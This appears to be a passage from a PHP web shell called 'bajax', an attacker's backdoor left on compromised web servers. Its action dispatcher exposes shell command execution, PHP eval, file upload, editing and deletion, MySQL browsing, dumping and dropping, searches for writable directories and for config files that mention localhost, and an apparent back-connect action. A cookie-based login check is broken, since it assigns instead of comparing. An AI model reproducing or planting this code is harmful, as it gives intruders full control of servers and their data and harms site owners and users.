$r.=$this->loc($dir.$file.DIRECTORY_SEPARATOR);
} else {
$sp = @file_get_contents($dir.DIRECTORY_SEPARATOR.$file);
if($sp)
if((stripos($sp, "\"localhost\""))|| (stripos($sp,'localhost'))) {
$r.=" $dir$file ";
}
}
}
}
}
return $r;
}
function locate_file($dir,$name) {
$res=array();
foreach (scandir($dir) as $file) {
if ($file !='.' && $file !='..') {
if (is_dir($dir.DIRECTORY_SEPARATOR.$file)) {
$res=array_merge($res,$this->locate_file($dir.DIRECTORY_SEPARATOR.$file,$name));
if (is_dir($dir.DIRECTORY_SEPARATOR.$file) && preg_match('/^'.$name.'/',$file )) {
$res[]=$dir.DIRECTORY_SEPARATOR.$file.DIRECTORY_SEPARATOR;
}
} else {
if (preg_match("/^$name/", $file)) {
$res[]=$dir.DIRECTORY_SEPARATOR.$file;
}
}
}
}
return $res;
}
function scdir($dir) {
$res=array();
foreach (scandir($dir) as $file) {
if ($file !='.' && $file !='..') {
if (is_dir($dir.DIRECTORY_SEPARATOR.$file)) {
$res=array_merge($res,$this->scdir($dir.DIRECTORY_SEPARATOR.$file));
if (is_dir($dir.DIRECTORY_SEPARATOR.$file) && is_writable($dir.DIRECTORY_SEPARATOR.$file)) {
$res[]=$dir.DIRECTORY_SEPARATOR.$file.DIRECTORY_SEPARATOR;
}
}
}
}
return $res;
}
function writable()
{
$r="";
if(isset($_POST['finddir'])&&isset($_POST['submit']))
{
$search=$this->scdir($_POST['finddir']);
if (count($search)>0) {
$r.="
Writable dir Found ";
foreach ($search as $file) {
if (is_dir($file)) {
$r.="$file ";
} else {
$r.="$file ";
}
}
} else {
$r.="Sorry, No writable dir found ";
}
$r.="
";
} else {
$r.="Find All Writable Directory ".$this->current('write')." ";
}
$r.="";
return $r;
}
function search() {
$r="";
if (isset($_POST['cari']) && $_POST['filename']) {
$search=$this->locate_file($_POST['addr'],$_POST['filename']);
if (count($search)>0) {
$r.="
Files Found ";
foreach ($search as $file) {
if (is_dir($file)) {
$r.="$file ";
} else {
$r.="$file ";
}
}
} else {
$r.="Sorry, No file found ";
}
$r.="
";
} else {
$r="Search File
".$this->current('search')."
";
}
$r.="";
return $r;
}
function bdf($dir) {
$r='';
$has=$_POST['bug'];
if($files = @scandir($dir)) {
foreach($files as $file) {
if($file != '.' && $file != '..'&& $file !='cgi-bin') {
if(@is_dir($dir.$slash.$file)) {
$r.=$this->bdf($dir.$file.DIRECTORY_SEPARATOR);
} else {
$op = @file_get_contents($dir.DIRECTORY_SEPARATOR.$file);
if($op)
foreach($has as $bug) {
if(@preg_match("/$bug\((.*?)\)/", $op)) {
$r.="Contain '$bug' at $dir.$file ".date("d-M-Y H:i",filemtime($dir.$file))." ";
}
}
}
}
}
}
return $r;
}
function doorscan() {
$this->find = array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file','copy','pcntl_exec','escapeshellarg','escapeshellcmd','proc_open','proc_get_status','proc_nice','proc_open','proc_terminate');
$r="";
if(isset($_POST['submit'])&&isset($_POST['bug']))
{ $r.="
These Files Probably Backdoor Last Modified ";
$r.=$this->bdf($_POST['dir']);
$r.="
";
}
else {
$r.="
Scan In : ".$this->current('bds')." Scan Type : ";
foreach ($this->find as $val) {
$r.="
".$val."
";
}
$r.="
";
$r.="";
}
$r.="
";
return $r;
}
function auth() {
$res='
Password :
';
return $res;
}
function cookies() {
if(isset($_POST['auth'])) {
$pass=strtolower(trim(md5($_POST['pass'])));
if($this->password=$pass) {
setcookie('bajax',$pass,time()+3600*24);
$url=$_SERVER['SCRIPT_NAME'];
header('location:'.$url);
die();
}
}
if(empty($_COOKIE['bajax']) and $_COOKIE['bajax'] !=$this->password) {
echo $this->auth();
die();
}
}
}
$bajax=new bajax();
$r='';
$r.=$bajax->header();
$r.=$bajax->menu();
$r.="";
switch ($_GET['act']) {
case 'file':
if(isset($_GET['act2'])=='del')
$r.=$bajax->remfile();
if(isset($_GET['act3'])=='del')
$r.=$bajax->remdir();
$r.=$bajax->xpl();
$r.=$bajax->center();
break;
case 'edit':
$r.=$bajax->edit($_GET['file']);
break;
case 'ren':
$r.=$bajax->ren($_GET['file']);
break;
case 'cmd':
$r.=$bajax->command();
$r.=$bajax->center();
break;
case 'downfile':
$r.=$bajax->downloadfile($_GET['file']);
break;
case 'down':
$r.=$bajax->get_selected($_GET['file']);
break;
case 'downfolder':
$r.=$bajax->downloadfolder($_GET['file']);
break;
case 'mysql':
$r.=$bajax->login();
break;
case 'view':
$r.=$bajax->lihatdb();
break;
case 'showtable':
$r.=$bajax->showtable();
break;
case 'showcon':
$r.=$bajax->showcon();
break;
case 'downdb':
$r.=$bajax->downdb();
break;
case 'downstruc':
$r.=$bajax->downstruc();
break;
case 'editrow':
$r.=$bajax->editrow();
break;
case 'logout':
$_SESSION=array();
session_destroy();
header("location:?act=mysql");
break;
case 'dropdb':
$r.=$bajax->dropsql();
break;
case 'delrow':
$r.=$bajax->droprow();
break;
case 'insertrow':$r.=$bajax->insertrow();break;
case 'encode':$r.=$bajax->converter();break;
case 'ser':$r.=$bajax->infoser();break;
case "eval":$r.=$bajax->phpeval();$r.=$bajax->center();break;
case 'write':$r.=$bajax->writable();break;
case 'bds':$r.=$bajax->doorscan();break;
case 'bc':$r.=$bajax->door();break;
case 'loc':$r.=$bajax->locate();break;
case 'search':$r.=$bajax->search();break;
case 'lihat':$r.=$bajax->lihat($_GET['file']);break;
case 'out':setcookie('bajax','',time()-3600*24);header("location:".$_SERVER['SCRIPT_NAME']);break;
default:
$r.=$bajax->logo();
break;
}
switch ($_POST['action']) {
case 'editfile':
if($bajax->editfile($_POST['file']))
$r.=header("location:?act=edit&dir=".$bajax->dir()."&file=".$_GET['file']."");
break;
case 'renamed':
if($bajax->rename($_POST['file']))
$r.=header("location:?act=file&dir=".$bajax->dir()."");
break;
case "mkdir":
$r.=$bajax->mkdir();
$r.=header("location:?act=file&dir=".$bajax->dir()."");
break;
case "createfile":
$r.=$bajax->createfile();
$r.=header("location:?act=file&dir=".$bajax->dir()."");
break;
case "uploader":
$r.=$bajax->upload();
$r.=header("location:?act=file&dir=".$bajax->dir()."");
break;
case 'createdb':
$r.=$bajax->createdb($_POST['dbname']);
break;
case 'updaterow':
$r.=$bajax->updaterow();
break;
case 'insertrow':
$r.=$bajax->insertrow();
break;
}
$r.="";
$r.=$bajax->footer();
$bajax->cookies();
echo $r;
ob_end_flush();
?>